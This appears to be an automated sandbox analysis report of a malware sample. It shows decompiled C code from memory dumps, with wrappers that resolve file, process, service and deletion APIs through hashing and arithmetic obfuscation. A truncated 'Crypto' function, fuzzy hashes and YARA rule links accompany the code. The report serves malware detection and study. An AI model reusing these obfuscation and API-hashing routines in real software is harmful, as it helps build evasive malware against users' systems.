											_t49 = _t49 + 1;
											_t66 = _t66 - 1;
										} while (_t66 != 0);
									}
									 *(_t77 - 8) = _t51;
									goto L13;
								}
							}
						} else {
							_t54 =  *(_a12 + 0x38);
							if(_t54 <= 0) {
								goto L14;
							} else {
								_push(4);
								_push(0x1000);
								_push(_t54);
								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
								if( *_t65() == 0) {
									L17:
									return 0;
								} else {
									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
									 *(_t77 - 8) = _t72;
									if(_t54 != 0) {
										_t58 = _t54;
										_t59 = _t58 >> 2;
										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
										_t78 = _t78 + 0x18;
									}
									L13:
									_t68 = _v8;
									_t65 = VirtualAlloc;
									goto L14;
								}
							}
						}
						goto L18;
						L14:
						_t53 = _v12 + 1;
						_t77 =  &(_t77[0xa]);
						_v12 = _t53;
					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L15;
				}
				L18:
			}

0x10001626
0x1000162a
0x1000162e
0x10001631
0x10001637
0x1000163a
0x10001645
0x1000170a
0x10001713
0x1000164b
0x1000164b
0x10001651
0x10001654
0x10001656
0x10001656
0x1000165a
0x100016ab
0x10001718
0x00000000
0x100016ad
0x100016bb
0x100016bf
0x00000000
0x100016c1
0x100016c4
0x100016c6
0x100016cb
0x100016d0
0x100016d2
0x100016d4
0x100016d6
0x100016d9
0x100016db
0x100016de
0x100016de
0x100016d6
0x100016e1
0x00000000
0x100016e1
0x100016bf
0x1000165c
0x1000165f
0x10001664
0x00000000
0x1000166a
0x1000166d
0x1000166f
0x10001674
0x10001677
0x1000167c
0x10001720
0x10001726
0x10001682
0x10001685
0x10001688
0x1000168d
0x1000168f
0x10001693
0x1000169f
0x1000169f
0x1000169f
0x100016e4
0x100016e4
0x100016e7
0x00000000
0x100016e7
0x1000167c
0x10001664
0x00000000
0x100016ed
0x100016f5
0x100016fa
0x100016fd
0x10001700
0x00000000
0x10001656
0x00000000

APIs

VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0024976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0024976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002407A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00249772
0x00249773
0x00249778
0x0024977a
0x0024977b
0x0024977e
0x0024977f
0x00249782
0x00249785
0x00249788
0x00249789
0x0024978c
0x0024978f
0x00249790
0x00249791
0x00249794
0x00249797
0x0024979a
0x0024979d
0x002497a0
0x002497a3
0x002497a6
0x002497a7
0x002497a8
0x002497ad
0x002497b7
0x002497c3
0x002497ca
0x002497d1
0x002497d8
0x002497df
0x002497e3
0x002497fc
0x00249816
0x0024981d

APIs

CreateProcessW.KERNEL32(0023591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0023591A), ref: 00249816

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 8aaaab428069adbc48d01d1842b8f6c1b76137c32856cc0d43b623e32781480e
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: E911B372911148BBDF199FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0023B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0023B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0023602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002407A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0023b569
0x0023b56a
0x0023b56d
0x0023b572
0x0023b574
0x0023b577
0x0023b57a
0x0023b57d
0x0023b580
0x0023b583
0x0023b586
0x0023b587
0x0023b58a
0x0023b58d
0x0023b590
0x0023b593
0x0023b594
0x0023b595
0x0023b59a
0x0023b5a4
0x0023b5b8
0x0023b5c0
0x0023b5c4
0x0023b5cb
0x0023b5d2
0x0023b5d9
0x0023b5e6
0x0023b5fd
0x0023b604

APIs

CreateFileW.KERNELBASE(00240668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00240668,?,?,?,?), ref: 0023B5FD

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: ae4d34fd2688908d7b37844e0c7cd486ab6290dc1b62701abbb9e3509a401dc7
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: E911C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0024981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0024981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002407A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00249821
0x00249822
0x00249825
0x00249828
0x0024982a
0x0024982c
0x0024982f
0x00249832
0x00249835
0x00249836
0x00249837
0x0024983c
0x00249855
0x00249858
0x0024985f
0x00249866
0x0024986d
0x00249874
0x0024987b
0x0024988e
0x0024989b
0x002498a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002387F2,0000CAAE,0000510C,AD82F196), ref: 0024989B

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 5c104816d0916b2f742d7da5e2f5af63a7c104f2388a3feb003ea95f8739dd8b
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 78015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00247BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00247BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002407A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00247bf7
0x00247bf8
0x00247bfa
0x00247bfd
0x00247bff
0x00247c02
0x00247c06
0x00247c07
0x00247c0f
0x00247c1d
0x00247c25
0x00247c2d
0x00247c31
0x00247c38
0x00247c3f
0x00247c46
0x00247c4a
0x00247c5e
0x00247c67
0x00247c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00247C67

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 770df398bab2141a37eb02192e8c8783d3f149e98fc0c61528bafcf87d895afb
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0A014FB190120CFFEB09DF94C84A8DEBBB9EF44314F108198F50567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0023F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0023F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002407A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0023f662
0x0023f663
0x0023f665
0x0023f668
0x0023f66a
0x0023f66d
0x0023f670
0x0023f673
0x0023f677
0x0023f678
0x0023f67d
0x0023f687
0x0023f693
0x0023f69a
0x0023f6a1
0x0023f6a5
0x0023f6a9
0x0023f6b0
0x0023f6c9
0x0023f6d8
0x0023f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0023F6D8

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: b0aab0a77048a0e0be9577124c09f0a3f59ce9ddf5566f454e9b60349f3fc5fa
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: FC01E5B6901208BBEF059F94DC4A8DF7F79EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0023B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0023602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002407A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0023b6f3
0x0023b6f8
0x0023b702
0x0023b70b
0x0023b712
0x0023b719
0x0023b720
0x0023b727
0x0023b72e
0x0023b747
0x0023b759
0x0023b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0023B759

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 793f8dda759908818510c1c0dcc9dcb3ef21eb4d32d3cbd2049d11a1b0679531
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: D60178B2950308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0024AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002407A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0024aa3f
0x0024aa40
0x0024aa41
0x0024aa44
0x0024aa47
0x0024aa4b
0x0024aa4c
0x0024aa51
0x0024aa5b
0x0024aa64
0x0024aa68
0x0024aa6f
0x0024aa76
0x0024aa8d
0x0024aa90
0x0024aa9d
0x0024aaa8
0x0024aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0024AAA8

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: d30233234a1f3f2a51f3f54581c7389b96fb4482909fd5c53c65e4e98134fc17
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: BBF069B191020CFFDF08DF94DD4A89EBFB8EB40304F108088F905A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000745A, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E1000745A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x1000745a
0x1000745c
0x1000745e
0x10007460
0x10007468

APIs

_doexit.LIBCMT ref: 10007460

Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00239FDC, Relevance: 39.5, Strings: 31, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00239FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E0023602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
